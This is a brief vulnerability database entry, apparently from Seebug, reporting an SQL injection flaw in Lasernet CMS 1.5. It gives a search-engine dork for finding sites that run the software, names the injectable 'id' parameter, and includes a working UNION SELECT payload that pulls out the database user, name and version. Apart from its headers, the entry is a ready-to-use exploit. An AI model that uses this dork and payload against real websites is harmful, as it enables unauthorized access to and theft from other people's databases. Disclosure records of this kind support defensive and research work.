Lasernet CMS 1.5 - SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:71948
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Title : LASERnet CMS  Vulnerable to SQL Injection
Vendor : http://lasernet.gr/cms.php
Dork : intext:"Powered by Lasernet"
Category: WebApps

http://localhost.com/index.php?id=[SQL]

Demo:
http://localhost.com/index.php
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+